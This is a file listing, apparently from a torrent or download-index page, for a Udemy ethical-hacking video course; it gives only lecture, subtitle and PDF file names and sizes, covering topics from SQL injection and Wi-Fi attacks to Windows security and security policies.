[FreeAllCourse.Com] Udemy - Hacking in Practice Certified Ethical Hacking MEGA Course

mp4   Hot:218   Size:4.79 GB   Created:2022-04-27 10:50:43   Update:2024-06-19 21:10:50  

File List

  • 01 Lets start/001 Welcome to the course.html 1.17 KB
    01 Lets start/002 Foreword FAQ.html 3.42 KB
    01 Lets start/003 Course preview 15 min. long demo lecture. The whole training is 27 hours long.en.srt 25.12 KB
    01 Lets start/003 Course preview 15 min. long demo lecture. The whole training is 27 hours long.it.srt 27.08 KB
    01 Lets start/003 Course preview 15 min. long demo lecture. The whole training is 27 hours long.mp4 213.49 MB
    02 Application Security/004 Why is this section here.html 1.22 KB
    02 Application Security/005 Introduction to Application Security.en.srt 8.99 KB
    02 Application Security/005 Introduction to Application Security.it.srt 9.84 KB
    02 Application Security/005 Introduction to Application Security.mp4 21.26 MB
    02 Application Security/006 Attacks on applications.en.srt 11.68 KB
    02 Application Security/006 Attacks on applications.it.srt 12.78 KB
    02 Application Security/006 Attacks on applications.mp4 25.5 MB
    02 Application Security/007 SQL Injection.en.srt 9.22 KB
    02 Application Security/007 SQL Injection.it.srt 9.96 KB
    02 Application Security/007 SQL Injection.mp4 17.96 MB
    02 Application Security/008 EXERCISE Analyze the application.en.srt 15.69 KB
    02 Application Security/008 EXERCISE Analyze the application.it.srt 16.73 KB
    02 Application Security/008 EXERCISE Analyze the application.mp4 28.74 MB
    02 Application Security/009 Blind SQL Injection.en.srt 11.07 KB
    02 Application Security/009 Blind SQL Injection.it.srt 12.14 KB
    02 Application Security/009 Blind SQL Injection.mp4 22.47 MB
    02 Application Security/010 Automated SQL Injection.en.srt 13.71 KB
    02 Application Security/010 Automated SQL Injection.it.srt 14.9 KB
    02 Application Security/010 Automated SQL Injection.mp4 29.48 MB
    02 Application Security/011 Cross-site scripting - XSS.en.srt 11.15 KB
    02 Application Security/011 Cross-site scripting - XSS.it.srt 12.19 KB
    02 Application Security/011 Cross-site scripting - XSS.mp4 29.1 MB
    02 Application Security/012 13-1-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.65 MB
    02 Application Security/012 Application Attacks - notes for the examination.html 898 B
    02 Application Security/013 Program security assessment.en.srt 6.08 KB
    02 Application Security/013 Program security assessment.it.srt 6.67 KB
    02 Application Security/013 Program security assessment.mp4 12.15 MB
    02 Application Security/014 Unsafe applications.en.srt 11.58 KB
    02 Application Security/014 Unsafe applications.it.srt 12.61 KB
    02 Application Security/014 Unsafe applications.mp4 24.95 MB
    02 Application Security/015 13-2-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.06 MB
    02 Application Security/015 Program Security Assessment - notes for the examination.html 906 B
    02 Application Security/external-assets-links.txt 137 B
    03 Introduction to Cyber Threats/016 Introduction to Current Cyber Threats.en.srt 6.08 KB
    03 Introduction to Cyber Threats/016 Introduction to Current Cyber Threats.it.srt 6.51 KB
    03 Introduction to Cyber Threats/016 Introduction to Current Cyber Threats.mp4 20.46 MB
    03 Introduction to Cyber Threats/017 IT Prehistory.en.srt 5.65 KB
    03 Introduction to Cyber Threats/017 IT Prehistory.it.srt 6.09 KB
    03 Introduction to Cyber Threats/017 IT Prehistory.mp4 25.8 MB
    03 Introduction to Cyber Threats/018 Lets look a few years back.en.srt 6.03 KB
    03 Introduction to Cyber Threats/018 Lets look a few years back.it.srt 6.54 KB
    03 Introduction to Cyber Threats/018 Lets look a few years back.mp4 23.63 MB
    03 Introduction to Cyber Threats/019 Cyber crimes - an evolution not revolution.en.srt 5.78 KB
    03 Introduction to Cyber Threats/019 Cyber crimes - an evolution not revolution.it.srt 6.03 KB
    03 Introduction to Cyber Threats/019 Cyber crimes - an evolution not revolution.mp4 21.26 MB
    03 Introduction to Cyber Threats/020 01-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.47 MB
    04 Popular IT Security Myths/021 Popular myths about IT security - origins.en.srt 6.4 KB
    04 Popular IT Security Myths/021 Popular myths about IT security - origins.it.srt 6.8 KB
    04 Popular IT Security Myths/021 Popular myths about IT security - origins.mp4 27.92 MB
    04 Popular IT Security Myths/022 Myths 1 - youll never be hacked.en.srt 6.85 KB
    04 Popular IT Security Myths/022 Myths 1 - youll never be hacked.it.srt 7.38 KB
    04 Popular IT Security Myths/022 Myths 1 - youll never be hacked.mp4 29.18 MB
    04 Popular IT Security Myths/023 Myths 2 - you dont need any protection software or hardware.en.srt 6.25 KB
    04 Popular IT Security Myths/023 Myths 2 - you dont need any protection software or hardware.it.srt 6.63 KB
    04 Popular IT Security Myths/023 Myths 2 - you dont need any protection software or hardware.mp4 25.77 MB
    04 Popular IT Security Myths/024 Myths 3 - IT security is always a priority.en.srt 1.3 KB
    04 Popular IT Security Myths/024 Myths 3 - IT security is always a priority.it.srt 1.42 KB
    04 Popular IT Security Myths/024 Myths 3 - IT security is always a priority.mp4 6 MB
    04 Popular IT Security Myths/025 01-1-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 988.5 KB
    05 IT Security Trends/026 Trends in IT Security.en.srt 4.18 KB
    05 IT Security Trends/026 Trends in IT Security.it.srt 4.54 KB
    05 IT Security Trends/026 Trends in IT Security.mp4 18.7 MB
    05 IT Security Trends/027 The birth of technology society.en.srt 3.44 KB
    05 IT Security Trends/027 The birth of technology society.it.srt 3.75 KB
    05 IT Security Trends/027 The birth of technology society.mp4 18.58 MB
    05 IT Security Trends/028 EXERCISE How much info can you gather.en.srt 4.2 KB
    05 IT Security Trends/028 EXERCISE How much info can you gather.it.srt 4.5 KB
    05 IT Security Trends/028 EXERCISE How much info can you gather.mp4 13.78 MB
    05 IT Security Trends/029 Fake identity.en.srt 5.6 KB
    05 IT Security Trends/029 Fake identity.it.srt 5.94 KB
    05 IT Security Trends/029 Fake identity.mp4 21.76 MB
    05 IT Security Trends/030 Online privacy.en.srt 6.68 KB
    05 IT Security Trends/030 Online privacy.it.srt 7.26 KB
    05 IT Security Trends/030 Online privacy.mp4 32.04 MB
    05 IT Security Trends/031 Analyzing sniffing software.en.srt 3.72 KB
    05 IT Security Trends/031 Analyzing sniffing software.it.srt 4.1 KB
    05 IT Security Trends/031 Analyzing sniffing software.mp4 19.5 MB
    05 IT Security Trends/032 Cyber War.en.srt 8.8 KB
    05 IT Security Trends/032 Cyber War.it.srt 9.52 KB
    05 IT Security Trends/032 Cyber War.mp4 45.4 MB
    05 IT Security Trends/033 01-2-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 2.04 MB
    06 Data Security/034 Objective 1 - Data security - Introduction.en.srt 7.29 KB
    06 Data Security/034 Objective 1 - Data security - Introduction.it.srt 8.01 KB
    06 Data Security/034 Objective 1 - Data security - Introduction.mp4 38.83 MB
    06 Data Security/035 Integrity of data.en.srt 7.04 KB
    06 Data Security/035 Integrity of data.it.srt 7.6 KB
    06 Data Security/035 Integrity of data.mp4 32.11 MB
    06 Data Security/036 01-3-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.99 MB
    06 Data Security/037 Confidentiality of data.en.srt 5.58 KB
    06 Data Security/037 Confidentiality of data.it.srt 5.99 KB
    06 Data Security/037 Confidentiality of data.mp4 31.65 MB
    06 Data Security/038 EXERCISE Finding confidential data with search engines.en.srt 5.97 KB
    06 Data Security/038 EXERCISE Finding confidential data with search engines.it.srt 6.27 KB
    06 Data Security/038 EXERCISE Finding confidential data with search engines.mp4 23.49 MB
    07 Computer Network Security/039 Network security - introduction.en.srt 6.31 KB
    07 Computer Network Security/039 Network security - introduction.it.srt 6.7 KB
    07 Computer Network Security/039 Network security - introduction.mp4 22.04 MB
    07 Computer Network Security/040 OSI MODEL 1 - Physical layer.en.srt 6.43 KB
    07 Computer Network Security/040 OSI MODEL 1 - Physical layer.it.srt 6.85 KB
    07 Computer Network Security/040 OSI MODEL 1 - Physical layer.mp4 28.95 MB
    07 Computer Network Security/041 OSI MODEL 2 - Data link layer.en.srt 5.25 KB
    07 Computer Network Security/041 OSI MODEL 2 - Data link layer.it.srt 5.68 KB
    07 Computer Network Security/041 OSI MODEL 2 - Data link layer.mp4 22.75 MB
    07 Computer Network Security/042 Threats MAC spoofing.en.srt 6.61 KB
    07 Computer Network Security/042 Threats MAC spoofing.it.srt 7.12 KB
    07 Computer Network Security/042 Threats MAC spoofing.mp4 27.46 MB
    07 Computer Network Security/043 Threats ARP Poisoning.en.srt 7.6 KB
    07 Computer Network Security/043 Threats ARP Poisoning.it.srt 8.05 KB
    07 Computer Network Security/043 Threats ARP Poisoning.mp4 31.29 MB
    07 Computer Network Security/044 EXERCISE Data Link Layer Attack.en.srt 8.02 KB
    07 Computer Network Security/044 EXERCISE Data Link Layer Attack.it.srt 8.74 KB
    07 Computer Network Security/044 EXERCISE Data Link Layer Attack.mp4 35.27 MB
    07 Computer Network Security/045 OSI MODEL 3 - Network layer.en.srt 7.16 KB
    07 Computer Network Security/045 OSI MODEL 3 - Network layer.it.srt 7.65 KB
    07 Computer Network Security/045 OSI MODEL 3 - Network layer.mp4 31.7 MB
    07 Computer Network Security/046 TCP Tunnelling over ICMP.en.srt 7.69 KB
    07 Computer Network Security/046 TCP Tunnelling over ICMP.it.srt 8.29 KB
    07 Computer Network Security/046 TCP Tunnelling over ICMP.mp4 34.99 MB
    07 Computer Network Security/047 06-1-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 2.22 MB
    07 Computer Network Security/048 OSI MODEL 4 - Transport Layer.en.srt 6.33 KB
    07 Computer Network Security/048 OSI MODEL 4 - Transport Layer.it.srt 6.88 KB
    07 Computer Network Security/048 OSI MODEL 4 - Transport Layer.mp4 28.63 MB
    07 Computer Network Security/049 Threats Enumerating Remote Computers.en.srt 4.03 KB
    07 Computer Network Security/049 Threats Enumerating Remote Computers.it.srt 4.4 KB
    07 Computer Network Security/049 Threats Enumerating Remote Computers.mp4 16.81 MB
    07 Computer Network Security/050 EXERCISE Transport Layer Attack using METASPLOIT part 1.en.srt 5.9 KB
    07 Computer Network Security/050 EXERCISE Transport Layer Attack using METASPLOIT part 1.it.srt 6.24 KB
    07 Computer Network Security/050 EXERCISE Transport Layer Attack using METASPLOIT part 1.mp4 12.84 MB
    07 Computer Network Security/051 EXERCISE Transport Layer Attack using METASPLOIT part 2.en.srt 5.69 KB
    07 Computer Network Security/051 EXERCISE Transport Layer Attack using METASPLOIT part 2.it.srt 6.09 KB
    07 Computer Network Security/051 EXERCISE Transport Layer Attack using METASPLOIT part 2.mp4 26.08 MB
    07 Computer Network Security/052 OSI MODEL 5 - Session Layer.en.srt 4.06 KB
    07 Computer Network Security/052 OSI MODEL 5 - Session Layer.it.srt 4.36 KB
    07 Computer Network Security/052 OSI MODEL 5 - Session Layer.mp4 16.38 MB
    07 Computer Network Security/053 06-2-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.1 MB
    07 Computer Network Security/054 OSI MODEL 6 - Presentation Layer.en.srt 6.8 KB
    07 Computer Network Security/054 OSI MODEL 6 - Presentation Layer.it.srt 7.3 KB
    07 Computer Network Security/054 OSI MODEL 6 - Presentation Layer.mp4 37.43 MB
    07 Computer Network Security/055 OSI MODEL 7 - Application Layer.en.srt 4.16 KB
    07 Computer Network Security/055 OSI MODEL 7 - Application Layer.it.srt 4.2 KB
    07 Computer Network Security/055 OSI MODEL 7 - Application Layer.mp4 16.92 MB
    07 Computer Network Security/056 EXERCISE Application Layer Attacks.en.srt 5.86 KB
    07 Computer Network Security/056 EXERCISE Application Layer Attacks.it.srt 6.08 KB
    07 Computer Network Security/056 EXERCISE Application Layer Attacks.mp4 18.99 MB
    07 Computer Network Security/057 Backtrack Attack Demonstration.en.srt 3.74 KB
    07 Computer Network Security/057 Backtrack Attack Demonstration.it.srt 3.89 KB
    07 Computer Network Security/057 Backtrack Attack Demonstration.mp4 15.59 MB
    07 Computer Network Security/058 Man-in-the-Middle and Denial of Service Attacks.en.srt 2.92 KB
    07 Computer Network Security/058 Man-in-the-Middle and Denial of Service Attacks.it.srt 3.07 KB
    07 Computer Network Security/058 Man-in-the-Middle and Denial of Service Attacks.mp4 14.2 MB
    07 Computer Network Security/059 Modifying Transmitted Packets.en.srt 5.07 KB
    07 Computer Network Security/059 Modifying Transmitted Packets.it.srt 5.35 KB
    07 Computer Network Security/059 Modifying Transmitted Packets.mp4 26.76 MB
    07 Computer Network Security/060 Unencrypted protocols.en.srt 3.25 KB
    07 Computer Network Security/060 Unencrypted protocols.it.srt 3.43 KB
    07 Computer Network Security/060 Unencrypted protocols.mp4 13.64 MB
    07 Computer Network Security/061 06-3-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 2.16 MB
    08 Designing Secure Computer Networks/062 Designing Computer Networks - introduction.en.srt 2.48 KB
    08 Designing Secure Computer Networks/062 Designing Computer Networks - introduction.it.srt 2.63 KB
    08 Designing Secure Computer Networks/062 Designing Computer Networks - introduction.mp4 10.93 MB
    08 Designing Secure Computer Networks/063 Subnetting IPv4.en.srt 7.83 KB
    08 Designing Secure Computer Networks/063 Subnetting IPv4.it.srt 8.17 KB
    08 Designing Secure Computer Networks/063 Subnetting IPv4.mp4 29.12 MB
    08 Designing Secure Computer Networks/064 Subnetting IPv6.en.srt 3.51 KB
    08 Designing Secure Computer Networks/064 Subnetting IPv6.it.srt 3.66 KB
    08 Designing Secure Computer Networks/064 Subnetting IPv6.mp4 17.45 MB
    08 Designing Secure Computer Networks/065 07-1-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.41 MB
    08 Designing Secure Computer Networks/066 IPv6 address notation.en.srt 6.9 KB
    08 Designing Secure Computer Networks/066 IPv6 address notation.it.srt 7.35 KB
    08 Designing Secure Computer Networks/066 IPv6 address notation.mp4 27.31 MB
    08 Designing Secure Computer Networks/067 DMZ demilitarized Zone.en.srt 6.84 KB
    08 Designing Secure Computer Networks/067 DMZ demilitarized Zone.it.srt 7.17 KB
    08 Designing Secure Computer Networks/067 DMZ demilitarized Zone.mp4 30.28 MB
    08 Designing Secure Computer Networks/068 Protocols and services IP SEC.en.srt 10.57 KB
    08 Designing Secure Computer Networks/068 Protocols and services IP SEC.it.srt 11.42 KB
    08 Designing Secure Computer Networks/068 Protocols and services IP SEC.mp4 43.74 MB
    08 Designing Secure Computer Networks/069 IP SEC Phase 1.en.srt 8.22 KB
    08 Designing Secure Computer Networks/069 IP SEC Phase 1.it.srt 8.78 KB
    08 Designing Secure Computer Networks/069 IP SEC Phase 1.mp4 21.71 MB
    08 Designing Secure Computer Networks/070 Network Address translation.en.srt 13.51 KB
    08 Designing Secure Computer Networks/070 Network Address translation.it.srt 14.21 KB
    08 Designing Secure Computer Networks/070 Network Address translation.mp4 52.64 MB
    08 Designing Secure Computer Networks/071 Network access control RADIUS.en.srt 11.99 KB
    08 Designing Secure Computer Networks/071 Network access control RADIUS.it.srt 12.67 KB
    08 Designing Secure Computer Networks/071 Network access control RADIUS.mp4 48.43 MB
    08 Designing Secure Computer Networks/072 07-2-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.19 MB
    09 Network administration/073 Introduction to Monitoring Transmitted Data.en.srt 1.31 KB
    09 Network administration/073 Introduction to Monitoring Transmitted Data.it.srt 1.36 KB
    09 Network administration/073 Introduction to Monitoring Transmitted Data.mp4 6.18 MB
    09 Network administration/074 Monitoring Transmitted Data - Basic informations.en.srt 9.75 KB
    09 Network administration/074 Monitoring Transmitted Data - Basic informations.it.srt 10.53 KB
    09 Network administration/074 Monitoring Transmitted Data - Basic informations.mp4 41.07 MB
    09 Network administration/075 Intrusion detection systems.en.srt 8.98 KB
    09 Network administration/075 Intrusion detection systems.it.srt 9.68 KB
    09 Network administration/075 Intrusion detection systems.mp4 38.23 MB
    09 Network administration/076 Why are firewalls and NDIS not enough.en.srt 6.39 KB
    09 Network administration/076 Why are firewalls and NDIS not enough.it.srt 6.57 KB
    09 Network administration/076 Why are firewalls and NDIS not enough.mp4 28.19 MB
    09 Network administration/077 Wireshark - Introduction to network analysis.en.srt 7.78 KB
    09 Network administration/077 Wireshark - Introduction to network analysis.it.srt 8.38 KB
    09 Network administration/077 Wireshark - Introduction to network analysis.mp4 30.65 MB
    09 Network administration/078 How to use Wireshark.en.srt 10.17 KB
    09 Network administration/078 How to use Wireshark.it.srt 11 KB
    09 Network administration/078 How to use Wireshark.mp4 43.55 MB
    09 Network administration/079 Analyzing Captured data.en.srt 6.52 KB
    09 Network administration/079 Analyzing Captured data.it.srt 6.78 KB
    09 Network administration/079 Analyzing Captured data.mp4 31.01 MB
    09 Network administration/080 How to analyze telnet protocol.en.srt 8.87 KB
    09 Network administration/080 How to analyze telnet protocol.it.srt 9.46 KB
    09 Network administration/080 How to analyze telnet protocol.mp4 37.99 MB
    09 Network administration/081 Intrusion detection.en.srt 8.66 KB
    09 Network administration/081 Intrusion detection.it.srt 9.42 KB
    09 Network administration/081 Intrusion detection.mp4 46.35 MB
    09 Network administration/082 Scanning computers.en.srt 8.21 KB
    09 Network administration/082 Scanning computers.it.srt 8.86 KB
    09 Network administration/082 Scanning computers.mp4 35.27 MB
    09 Network administration/083 08-1-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.77 MB
    10 Wireless Networks Security/084 Wireless Networks.en.srt 1.39 KB
    10 Wireless Networks Security/084 Wireless Networks.it.srt 1.49 KB
    10 Wireless Networks Security/084 Wireless Networks.mp4 6.96 MB
    10 Wireless Networks Security/085 WIFI security solutions - introduction.en.srt 6.34 KB
    10 Wireless Networks Security/085 WIFI security solutions - introduction.it.srt 6.79 KB
    10 Wireless Networks Security/085 WIFI security solutions - introduction.mp4 29.17 MB
    10 Wireless Networks Security/086 WIFI - working principles.en.srt 6.63 KB
    10 Wireless Networks Security/086 WIFI - working principles.it.srt 7.23 KB
    10 Wireless Networks Security/086 WIFI - working principles.mp4 29.36 MB
    10 Wireless Networks Security/087 Other wireless technologies.en.srt 3.34 KB
    10 Wireless Networks Security/087 Other wireless technologies.it.srt 3.6 KB
    10 Wireless Networks Security/087 Other wireless technologies.mp4 13.16 MB
    10 Wireless Networks Security/088 Threats and risks.en.srt 5.13 KB
    10 Wireless Networks Security/088 Threats and risks.it.srt 5.58 KB
    10 Wireless Networks Security/088 Threats and risks.mp4 18.49 MB
    10 Wireless Networks Security/089 Ineffective solutions.en.srt 4.69 KB
    10 Wireless Networks Security/089 Ineffective solutions.it.srt 5.07 KB
    10 Wireless Networks Security/089 Ineffective solutions.mp4 18.98 MB
    10 Wireless Networks Security/090 Authentication methods.en.srt 9.77 KB
    10 Wireless Networks Security/090 Authentication methods.it.srt 10.41 KB
    10 Wireless Networks Security/090 Authentication methods.mp4 37.13 MB
    10 Wireless Networks Security/091 802.11 WEP.en.srt 7.73 KB
    10 Wireless Networks Security/091 802.11 WEP.it.srt 8.24 KB
    10 Wireless Networks Security/091 802.11 WEP.mp4 31.39 MB
    10 Wireless Networks Security/092 802.11I WPA.en.srt 6.57 KB
    10 Wireless Networks Security/092 802.11I WPA.it.srt 7.06 KB
    10 Wireless Networks Security/092 802.11I WPA.mp4 31.59 MB
    10 Wireless Networks Security/093 09-1-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.46 MB
    10 Wireless Networks Security/094 Threats of WIFI networks.en.srt 6.7 KB
    10 Wireless Networks Security/094 Threats of WIFI networks.it.srt 7.39 KB
    10 Wireless Networks Security/094 Threats of WIFI networks.mp4 30.54 MB
    10 Wireless Networks Security/095 Client Attacks Launching a rogue access point.en.srt 7.55 KB
    10 Wireless Networks Security/095 Client Attacks Launching a rogue access point.it.srt 8.21 KB
    10 Wireless Networks Security/095 Client Attacks Launching a rogue access point.mp4 33.57 MB
    10 Wireless Networks Security/096 Client Attacks Evil twin.en.srt 5.27 KB
    10 Wireless Networks Security/096 Client Attacks Evil twin.it.srt 5.75 KB
    10 Wireless Networks Security/096 Client Attacks Evil twin.mp4 22.76 MB
    10 Wireless Networks Security/097 Client Attacks Denial of service.en.srt 10.32 KB
    10 Wireless Networks Security/097 Client Attacks Denial of service.it.srt 11.17 KB
    10 Wireless Networks Security/097 Client Attacks Denial of service.mp4 36.52 MB
    10 Wireless Networks Security/098 EXERCISE WPA attack.en.srt 3.88 KB
    10 Wireless Networks Security/098 EXERCISE WPA attack.it.srt 4.09 KB
    10 Wireless Networks Security/098 EXERCISE WPA attack.mp4 8.86 MB
    10 Wireless Networks Security/099 09-2-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.7 MB
    11 Operating Systems Security/100 Operating systems security - introduction.en.srt 10.3 KB
    11 Operating Systems Security/100 Operating systems security - introduction.it.srt 11.02 KB
    11 Operating Systems Security/100 Operating systems security - introduction.mp4 48.07 MB
    11 Operating Systems Security/101 Security boundaries.en.srt 5.32 KB
    11 Operating Systems Security/101 Security boundaries.it.srt 5.74 KB
    11 Operating Systems Security/101 Security boundaries.mp4 21.2 MB
    11 Operating Systems Security/102 Three core.en.srt 8.22 KB
    11 Operating Systems Security/102 Three core.it.srt 8.85 KB
    11 Operating Systems Security/102 Three core.mp4 29.75 MB
    11 Operating Systems Security/103 EXERCISE OS boundaries.en.srt 7.76 KB
    11 Operating Systems Security/103 EXERCISE OS boundaries.it.srt 8.46 KB
    11 Operating Systems Security/103 EXERCISE OS boundaries.mp4 39.1 MB
    11 Operating Systems Security/104 Process isolation.en.srt 7.16 KB
    11 Operating Systems Security/104 Process isolation.it.srt 7.74 KB
    11 Operating Systems Security/104 Process isolation.mp4 26.85 MB
    11 Operating Systems Security/105 Kernel Mode Code Signing.en.srt 6.94 KB
    11 Operating Systems Security/105 Kernel Mode Code Signing.it.srt 7.75 KB
    11 Operating Systems Security/105 Kernel Mode Code Signing.mp4 25.68 MB
    11 Operating Systems Security/106 Java Virtual Machine and code access security.en.srt 4.86 KB
    11 Operating Systems Security/106 Java Virtual Machine and code access security.it.srt 5.32 KB
    11 Operating Systems Security/106 Java Virtual Machine and code access security.mp4 18.64 MB
    11 Operating Systems Security/107 10-1-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 4.25 MB
    11 Operating Systems Security/108 Malware.en.srt 14.09 KB
    11 Operating Systems Security/108 Malware.it.srt 15.14 KB
    11 Operating Systems Security/108 Malware.mp4 44.86 MB
    11 Operating Systems Security/109 EXERCISE Vulnerability attacks.en.srt 10.48 KB
    11 Operating Systems Security/109 EXERCISE Vulnerability attacks.it.srt 11.31 KB
    11 Operating Systems Security/109 EXERCISE Vulnerability attacks.mp4 47.61 MB
    11 Operating Systems Security/110 EXERCISE Identifying suspicious processes.en.srt 7.7 KB
    11 Operating Systems Security/110 EXERCISE Identifying suspicious processes.it.srt 8.25 KB
    11 Operating Systems Security/110 EXERCISE Identifying suspicious processes.mp4 29.97 MB
    11 Operating Systems Security/111 Demonstration Process Explorer.en.srt 9.91 KB
    11 Operating Systems Security/111 Demonstration Process Explorer.it.srt 10.73 KB
    11 Operating Systems Security/111 Demonstration Process Explorer.mp4 38.13 MB
    11 Operating Systems Security/112 EXERCISE Removing malware.en.srt 9.47 KB
    11 Operating Systems Security/112 EXERCISE Removing malware.it.srt 10.34 KB
    11 Operating Systems Security/112 EXERCISE Removing malware.mp4 45.85 MB
    11 Operating Systems Security/113 Rootkits.en.srt 6.71 KB
    11 Operating Systems Security/113 Rootkits.it.srt 7.33 KB
    11 Operating Systems Security/113 Rootkits.mp4 28.94 MB
    11 Operating Systems Security/114 EXERCISE Detecting rootkits.en.srt 12.13 KB
    11 Operating Systems Security/114 EXERCISE Detecting rootkits.it.srt 13.15 KB
    11 Operating Systems Security/114 EXERCISE Detecting rootkits.mp4 58.29 MB
    11 Operating Systems Security/115 EXERCISE Security evaluation.en.srt 6.54 KB
    11 Operating Systems Security/115 EXERCISE Security evaluation.it.srt 7.12 KB
    11 Operating Systems Security/115 EXERCISE Security evaluation.mp4 17.82 MB
    11 Operating Systems Security/116 10-2-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 2.49 MB
    12 Access Control/117 Authentication and authorisation - Introduction.en.srt 2 KB
    12 Access Control/117 Authentication and authorisation - Introduction.it.srt 2.16 KB
    12 Access Control/117 Authentication and authorisation - Introduction.mp4 9.63 MB
    12 Access Control/118 Authentication users.en.srt 7.86 KB
    12 Access Control/118 Authentication users.it.srt 8.48 KB
    12 Access Control/118 Authentication users.mp4 31.37 MB
    12 Access Control/119 How secure is your password.en.srt 5.7 KB
    12 Access Control/119 How secure is your password.it.srt 6.05 KB
    12 Access Control/119 How secure is your password.mp4 15.97 MB
    12 Access Control/120 Authentication protocols and services.en.srt 8.7 KB
    12 Access Control/120 Authentication protocols and services.it.srt 9.35 KB
    12 Access Control/120 Authentication protocols and services.mp4 31.82 MB
    12 Access Control/121 11-1-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 2.86 MB
    12 Access Control/122 LM Hash.en.srt 7.51 KB
    12 Access Control/122 LM Hash.it.srt 8.02 KB
    12 Access Control/122 LM Hash.mp4 30.7 MB
    12 Access Control/123 Cached Credentials.en.srt 5.03 KB
    12 Access Control/123 Cached Credentials.it.srt 5.36 KB
    12 Access Control/123 Cached Credentials.mp4 18.08 MB
    12 Access Control/124 KERBEROS.en.srt 12.17 KB
    12 Access Control/124 KERBEROS.it.srt 13.32 KB
    12 Access Control/124 KERBEROS.mp4 52.56 MB
    12 Access Control/125 Identity Theft.en.srt 10.49 KB
    12 Access Control/125 Identity Theft.it.srt 11.35 KB
    12 Access Control/125 Identity Theft.mp4 42.95 MB
    12 Access Control/126 EXERCISE Offline attacks.en.srt 12.91 KB
    12 Access Control/126 EXERCISE Offline attacks.it.srt 13.81 KB
    12 Access Control/126 EXERCISE Offline attacks.mp4 45.63 MB
    12 Access Control/127 Using online cracking services.en.srt 9.53 KB
    12 Access Control/127 Using online cracking services.it.srt 10.28 KB
    12 Access Control/127 Using online cracking services.mp4 37.65 MB
    12 Access Control/128 11-2-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 2.12 MB
    13 Windows Security/129 Windows Security - what youll learn.en.srt 1.38 KB
    13 Windows Security/129 Windows Security - what youll learn.it.srt 1.45 KB
    13 Windows Security/129 Windows Security - what youll learn.mp4 7.59 MB
    13 Windows Security/130 User Account Control.en.srt 6.77 KB
    13 Windows Security/130 User Account Control.it.srt 7.27 KB
    13 Windows Security/130 User Account Control.mp4 32.01 MB
    13 Windows Security/131 UAC configuration.en.srt 8.94 KB
    13 Windows Security/131 UAC configuration.it.srt 9.67 KB
    13 Windows Security/131 UAC configuration.mp4 35.1 MB
    13 Windows Security/132 Additional Security Features - ASLR and DEP.en.srt 12.89 KB
    13 Windows Security/132 Additional Security Features - ASLR and DEP.it.srt 13.86 KB
    13 Windows Security/132 Additional Security Features - ASLR and DEP.mp4 40.91 MB
    13 Windows Security/133 PatchGuard.en.srt 1.57 KB
    13 Windows Security/133 PatchGuard.it.srt 1.71 KB
    13 Windows Security/133 PatchGuard.mp4 7.86 MB
    13 Windows Security/134 12-1-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.44 MB
    13 Windows Security/135 Encryption - key protection.en.srt 16.07 KB
    13 Windows Security/135 Encryption - key protection.it.srt 17.44 KB
    13 Windows Security/135 Encryption - key protection.mp4 46.34 MB
    13 Windows Security/136 Drive encryption.en.srt 9.31 KB
    13 Windows Security/136 Drive encryption.it.srt 9.87 KB
    13 Windows Security/136 Drive encryption.mp4 37.33 MB
    13 Windows Security/137 BitLocker.en.srt 8.94 KB
    13 Windows Security/137 BitLocker.it.srt 9.49 KB
    13 Windows Security/137 BitLocker.mp4 36.43 MB
    13 Windows Security/138 BitLocker To Go Reader.en.srt 5.04 KB
    13 Windows Security/138 BitLocker To Go Reader.it.srt 5.43 KB
    13 Windows Security/138 BitLocker To Go Reader.mp4 18.44 MB
    13 Windows Security/139 File and folder encryption - EFS.en.srt 8.13 KB
    13 Windows Security/139 File and folder encryption - EFS.it.srt 8.74 KB
    13 Windows Security/139 File and folder encryption - EFS.mp4 34.52 MB
    13 Windows Security/140 EXERCISE EFS.en.srt 6.07 KB
    13 Windows Security/140 EXERCISE EFS.it.srt 6.51 KB
    13 Windows Security/140 EXERCISE EFS.mp4 15.35 MB
    13 Windows Security/141 12-2-CISS-Ethical-Hacking-Training-2.0-by-www.SecAcademy.com.pdf 1.6 MB
    14 Security Policies/142 Security policies introduction.en.srt 2.13 KB
    14 Security Policies/142 Security policies introduction.it.srt 2.33 KB
    14 Security Policies/142 Security policies introduction.mp4 5.87 MB
    14 Security Policies/143 What is security.en.srt 3.89 KB
    14 Security Policies/143 What is security.it.srt 4.15 KB
    14 Security Policies/143 What is security.mp4 10.89 MB
    14 Security Policies/144 Information security.en.srt 4.12 KB
    14 Security Policies/144 Information security.it.srt 4.46 KB
    14 Security Policies/144 Information security.mp4 10.26 MB
    14 Security Policies/145 Information security - level up.en.srt 4.26 KB
    14 Security Policies/145 Information security - level up.it.srt 4.61 KB
    14 Security Policies/145 Information security - level up.mp4 9.87 MB
    14 Security Policies/146 Security issues.en.srt 5.02 KB
    14 Security Policies/146 Security issues.it.srt 5.48 KB
    14 Security Policies/146 Security issues.mp4 12.84 MB
    14 Security Policies/147 Why are security solutions fallible.en.srt 5.96 KB
    14 Security Policies/147 Why are security solutions fallible.it.srt 6.44 KB
    14 Security Policies/147 Why are security solutions fallible.mp4 15.48 MB
    14 Security Policies/148 Security policy issues.en.srt 5.07 KB
    14 Security Policies/148 Security policy issues.it.srt 5.48 KB
    14 Security Policies/148 Security policy issues.mp4 12.6 MB
